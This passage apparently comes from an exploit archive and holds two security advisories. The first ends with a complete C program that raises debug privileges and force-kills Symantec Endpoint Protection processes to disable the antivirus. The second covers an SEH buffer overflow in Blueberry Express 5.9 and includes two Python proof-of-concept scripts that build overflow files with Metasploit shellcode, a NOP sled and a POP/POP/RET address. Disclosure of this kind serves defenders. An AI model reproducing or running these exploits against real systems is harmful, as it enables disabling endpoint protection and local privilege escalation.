Symantec central management server and enabling globally managed password
protection controls. Tested successfully on Windows 7 SP1 result may vary
OS to OS.
Scenario:
Run the from browser upon download or save to some directory and run
Not the most elegant code and I don't care...
*/
void el_crookedio_crosso(const char *victimo){
HANDLE hSnapShot=CreateToolhelp32Snapshot(TH32CS_SNAPALL,0);
PROCESSENTRY32 pEntry;
pEntry.dwSize=sizeof(pEntry);
BOOL hRes=Process32First(hSnapShot,&pEntry);
while(hRes){
if(strcmp(pEntry.szExeFile,victimo)==0){
HANDLE
hProcess=OpenProcess(PROCESS_TERMINATE,0,(DWORD)pEntry.th32ProcessID);
if (hProcess!=NULL){
TerminateProcess(hProcess,9);
CloseHandle(hProcess);
}
}
hRes=Process32Next(hSnapShot,&pEntry);
}
CloseHandle(hSnapShot);
}
DWORD exeo_de_pid(char *ghostofsin){
DWORD ret=0;
PROCESSENTRY32 pe32={sizeof (PROCESSENTRY32)};
HANDLE hProcSnap=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
if (hProcSnap==INVALID_HANDLE_VALUE) return 0;
if (Process32First (hProcSnap,&pe32))
do
if (!strcmp(pe32.szExeFile,ghostofsin)) {
ret=pe32.th32ProcessID;
break;
}
while (Process32Next (hProcSnap,&pe32));
CloseHandle (hProcSnap);
return ret;
}
void angelo_maliciouso(){
int AV=exeo_de_pid(SMC_EXE);
char id[8];
sprintf(id, "%d ", AV);
printf("%s", id);
char cmd[50]="Taskkill /F /PID ";
strcat(cmd, id);
system(cmd);
// system("Taskkill /F /IM Smc.exe"); //Access denied.
system("\"C:\\Program Files (x86)\\Symantec\\Symantec Endpoint
Protection\\Smc.exe\" -disable -ntp");
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
}
int main(void){
puts("/*-----------------------------------------------------------*/\n");
puts("| EXORCIST DE SYMANTEC Antivirus version 12.1.4013
|\n");
puts("| By hyp3rlinx - Jan 2015
|\n");
puts("/*------------------------------------------------------------*/\n");
SetDebugPrivileges();
angelo_maliciouso();
Sleep(1000);
el_crookedio_crosso(SMC_EXE);
el_crookedio_crosso(SMC_GUI);
el_crookedio_crosso(CC_SVC_HST);
Sleep(2000);
angelo_maliciouso();
Sleep(6000);
return 0;
}
int SetDebugPrivileges(){
DWORD err=0;
TOKEN_PRIVILEGES Debug_Privileges;
if(!LookupPrivilegeValue(NULL,SE_DEBUG_NAME,&Debug_Privileges.Privileges[0].Luid))return
GetLastError();
HANDLE hToken=0;
if(!OpenProcessToken(GetCurrentProcess(),TOKEN_ADJUST_PRIVILEGES,&hToken)){
err=GetLastError();
if(hToken)CloseHandle(hToken);
return err;
}
Debug_Privileges.Privileges[0].Attributes=SE_PRIVILEGE_ENABLED;
Debug_Privileges.PrivilegeCount=1;
if(!AdjustTokenPrivileges(hToken,FALSE,&Debug_Privileges,0,NULL,NULL)){
err=GetLastError();
if(hToken) CloseHandle(hToken);
}
return err;
}
Disclosure Timeline:
=========================================================
Vendor Notification: Jan 20, 2015
July 7, 2015 : Public Disclosure
Severity Level:
=========================================================
High
Description:
==================================================================
Request Method(s): [+] Click
Vulnerable Product: [+] Symantec Endpoint Protection version
12.1.4013
Vulnerable Parameter(s): [+] N/A
Affected Area(s): [+] Smc.exe, SmcGui.exe & ccSvcHst.exe
======================================================================
[+] Disclaimer
Permission is hereby granted for the redistribution of this advisory,
provided that it is not altered except by reformatting it, and that due
credit is given. Permission is explicitly given for insertion in
vulnerability databases and similar, provided that due credit is given to
the author. The author is not responsible for any misuse of the information
contained herein and prohibits any malicious use of all security related
information or exploits by the author or elsewhere.
(hyp3rlinx)

226
platforms/windows/local/37535.txt Executable file
View file

@ -0,0 +1,226 @@
Document Title:
===============
Blueberry Express v5.9.x - SEH Buffer Overflow Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1535
Video: http://www.vulnerability-lab.com/get_content.php?id=1537
Release Date:
=============
2015-06-29
Vulnerability Laboratory ID (VL-ID):
====================================
1535
Common Vulnerability Scoring System:
====================================
6.4
Product & Service Introduction:
===============================
Create engaging movies by adding text, sound and images to your screen recording. Make sure your audience doesn`t miss a
thing with easy-to-use Zoom-Pan and AutoScroll effects. Create polished tutorials and presentations with the help of powerful
editing functions. Do it the easy way with BB FlashBack screen recorder. Its never been easier for everyone to see your movies.
BB FlashBack screen recorder shares with FlashBack Connect or Youtube to display your movies on all devices.(FlashBack Connect
is currently in Beta, and available only to Pro and Standard edition purchasers).
(Copy of the Vendor Homepage: http://www.bbsoftware.co.uk/bbflashback.aspx )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research Team discovered a local seh buffer overflow vulnerability in the official Blueberry Express v5.9.0.3678 software.
Vulnerability Disclosure Timeline:
==================================
2015-06-29: Researcher Notification & Coordination (Ateeq Khan)
Discovery Status:
=================
Published
Affected Product(s):
====================
Blueberry Software
Product: Blueberry Express - Software 5.9.0.3678
Exploitation Technique:
=======================
Local
Severity Level:
===============
High
Technical Details & Description:
================================
A local SEH Buffer Overflow vulnerability has been discovered in the official Blueberry Express v5.9.0.3678 software.
The vulnerability allows local or remote attacker to gain higher system or access privileges by exploitation of a
classic seh buffer overflow vulnerability.
The local SEH Buffer Overflow affects multiple products including the BBFlashBack Recorder, Batch Export etc.
Other products using similar modules might also be affected. The vulnerability can be exploited by local attackers with low privilege system user account.
The attacker vector of the issue is server-side and the request method to execute the shellcode is local.
The security risk of the buffer overflow vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.4.
Successful exploitation of this vulnerability results in complete compromise of the affected machine and system process.
Proof of Concept (PoC):
=======================
The buffer overflow vulnerability can be exploited by local attackers with restricted system user account and without user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
POC Description:
For POC, the researcher installed the software with admin privileges on a windows system (allowed to run for all users), while application
still running in the background, logged off and logged in with a different (low privileged) user. Exploited the vulnerability successfully
hence giving the researcher a system shell with elevated admin privileges. Privilege escalation is possible in this scenario.
Malwares wont be able to exploit this vulnerability remotely as this is a Local exploit.
Manual steps to reproduce the vulnerability ...
1) Run BB Flashback Express Recorder
2) Goto TOOLS > OPTIONS > MISC
3) Click on "Use custom folder" under the Temp Folder module
4) Copy / Paste the POC binary code (record.txt) into the input field of custom folder
5) Click OK
Note: Calculator should popup hence proving the existence of this vulnerability
PoC: Exploitcode
# Exploit Title: Blueberry Express Recorder SEH based buffer overflow (Local) Exploit
# Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/)
# Windows Calc.exe Shellcode - Metasploit
shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
push="\x90" * 288 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled
print "Creating expoit file"
f=open("recorder.txt","w")
try:
f.write(push+nseh+seh+nopsled+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
PoC#2: Exploitcode
# Exploit Title: Blueberry Express Batch Export SEH based buffer overflow (Local)
# Discovered by: Ateeq Khan - @ohtheITguy (http://www.vulnerability-lab.com/)
print "Creating expoit file"
f=open("batch.txt","w") #Create the file
# Windows Calc.exe Shellcode - Metasploit
shellcode = ("\xda\xdb\xd9\x74\x24\xf4\x5b\x31\xc9\xb1\x32\xb8\x6e\xb9\xe3"
"\x05\x31\x43\x17\x83\xc3\x04\x03\x2d\xaa\x01\xf0\x4d\x24\x4c"
"\xfb\xad\xb5\x2f\x75\x48\x84\x7d\xe1\x19\xb5\xb1\x61\x4f\x36"
"\x39\x27\x7b\xcd\x4f\xe0\x8c\x66\xe5\xd6\xa3\x77\xcb\xd6\x6f"
"\xbb\x4d\xab\x6d\xe8\xad\x92\xbe\xfd\xac\xd3\xa2\x0e\xfc\x8c"
"\xa9\xbd\x11\xb8\xef\x7d\x13\x6e\x64\x3d\x6b\x0b\xba\xca\xc1"
"\x12\xea\x63\x5d\x5c\x12\x0f\x39\x7d\x23\xdc\x59\x41\x6a\x69"
"\xa9\x31\x6d\xbb\xe3\xba\x5c\x83\xa8\x84\x51\x0e\xb0\xc1\x55"
"\xf1\xc7\x39\xa6\x8c\xdf\xf9\xd5\x4a\x55\x1c\x7d\x18\xcd\xc4"
"\x7c\xcd\x88\x8f\x72\xba\xdf\xc8\x96\x3d\x33\x63\xa2\xb6\xb2"
"\xa4\x23\x8c\x90\x60\x68\x56\xb8\x31\xd4\x39\xc5\x22\xb0\xe6"
"\x63\x28\x52\xf2\x12\x73\x38\x05\x96\x09\x05\x05\xa8\x11\x25"
"\x6e\x99\x9a\xaa\xe9\x26\x49\x8f\x06\x6d\xd0\xb9\x8e\x28\x80"
"\xf8\xd2\xca\x7e\x3e\xeb\x48\x8b\xbe\x08\x50\xfe\xbb\x55\xd6"
"\x12\xb1\xc6\xb3\x14\x66\xe6\x91\x76\xe9\x74\x79\x79")
push="\x90" * 6596 # Starting offset
nseh="\xeb\x06\x90\x90" # Short jump
seh="\xf3\x43\x10\x40" # POP/POP/RET - [vcl60.bpl] [NoSafeSEH]
nopsled="\x90" * 30 # NOPsled
try:
f.write(push+nseh+seh+nopsled+shellcode)
f.close()
print "File created"
except:
print "File cannot be created"
Reference(s):
http://www.bbsoftware.co.uk/
http://www.bbsoftware.co.uk/bbflashback/download.aspx
Security Risk:
==============
The security risk of the local seh buffer overflow software vulnerability is estimated as high. (CVSS 6.4)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Ateeq Khan (Ateeq@evolution-sec.com)
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt